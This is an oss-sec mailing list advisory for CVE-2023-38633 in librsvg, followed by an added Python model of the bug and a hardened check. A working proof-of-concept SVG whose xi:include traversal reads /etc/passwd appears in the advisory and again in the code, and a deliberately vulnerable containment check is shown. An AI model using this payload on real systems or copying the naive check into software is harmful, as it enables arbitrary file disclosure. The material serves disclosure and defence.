oss-sec mailing list archives
CVE-2023-38633 in librsvg: Arbitrary file read when xinclude href has special characters
From: Alan Coopersmith <alan.coopersmith () oracle com>
Date: Thu, 27 Jul 2023 13:36:17 -0700
I haven't seen this go by yet, so for those who haven't seen it:
https://gitlab.gnome.org/GNOME/librsvg/-/issues/996 reports:

CVE-2023-38633: Arbitrary file read when xinclude href has special characters

This was reported by Zac Sims.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
  <rect width="300" height="300" style="fill:rgb(255,255,255);" />
  <text x="10" y="100"><xi:include href=".?../../../../../../../../../../etc/passwd" parse="text" encoding="UTF-8">
    <xi:fallback>file not found</xi:fallback>
  </xi:include></text>
</svg>

This ends up actually including the contents of /etc/passwd, bypassing the checks in UrlResolver::resolve_href().

The above linked bug report provides further analysis and links to merge requests for the fixes. Fixes have been published in new releases of librsvg for many release trains:

  2.56.3
  2.55.3
  2.54.6
  2.52.10
  2.50.8
  2.48.11
  2.46.6

-- 
-Alan Coopersmith- alan.coopersmith () oracle com
Oracle Solaris Engineering - https://blogs.oracle.com/solaris
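The mail describes a containment check in UrlResolver::resolve_href() that the "?" in the href slips past. The following is an added, constructed model of that bug class, not librsvg's code: a naive check that tests only the parsed URL path (which a "?" truncates) beside a hardened check that rejects query and fragment components and tests the normalised filesystem path, plus a pre-render scan over an SVG. The base document URL, allowed directory and sample SVG are constructed for the example.

```python
import posixpath
from urllib.parse import urljoin, urlsplit, unquote
import xml.etree.ElementTree as ET

XI_NS = "{http://www.w3.org/2001/XInclude}"
BASE_SVG_URL = "file:///srv/svg/doc.svg"   # constructed: the document being rendered
ALLOWED_DIR = "/srv/svg"                   # constructed: includes may only come from here


def naive_allowed(href: str) -> bool:
    """Containment test on the parsed URL path only (the bypassed pattern).
    urljoin() treats everything after '?' as a query string, so for the
    advisory's href the path collapses to the base directory and the test
    passes although the traversal is still carried in the query part."""
    parts = urlsplit(urljoin(BASE_SVG_URL, href))
    if parts.scheme != "file":
        return False
    path = posixpath.normpath(unquote(parts.path))
    return path == ALLOWED_DIR or path.startswith(ALLOWED_DIR + "/")


def hardened_allowed(href: str) -> bool:
    """Accept only a plain relative path and test the normalised
    filesystem path, not the URL view, against the allowed directory."""
    parts = urlsplit(href)
    # '?' and '#' are exactly what makes the URL view and the filesystem
    # view of the same string disagree; a local include needs neither.
    if parts.scheme or parts.netloc or parts.query or parts.fragment:
        return False
    if parts.path.startswith("/"):
        return False
    candidate = posixpath.normpath(posixpath.join(ALLOWED_DIR, unquote(parts.path)))
    return candidate.startswith(ALLOWED_DIR + "/")


def unsafe_includes(svg_text: str) -> list:
    """Return every xi:include href in an SVG that the hardened check rejects;
    usable as a pre-render scan over untrusted SVG input."""
    root = ET.fromstring(svg_text)
    return [el.get("href", "") for el in root.iter(XI_NS + "include")
            if not hardened_allowed(el.get("href", ""))]


# Constructed sample: the proof-of-concept document from the advisory, trimmed.
POC_SVG = """<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
  <text x="10" y="100"><xi:include href=".?../../../../../../../../../../etc/passwd"
      parse="text" encoding="UTF-8"><xi:fallback>file not found</xi:fallback></xi:include></text>
</svg>"""
```

The naive check accepts the advisory's href because its URL path is just the base directory; the hardened check refuses it, and also refuses the percent-encoded and plain "../" variants.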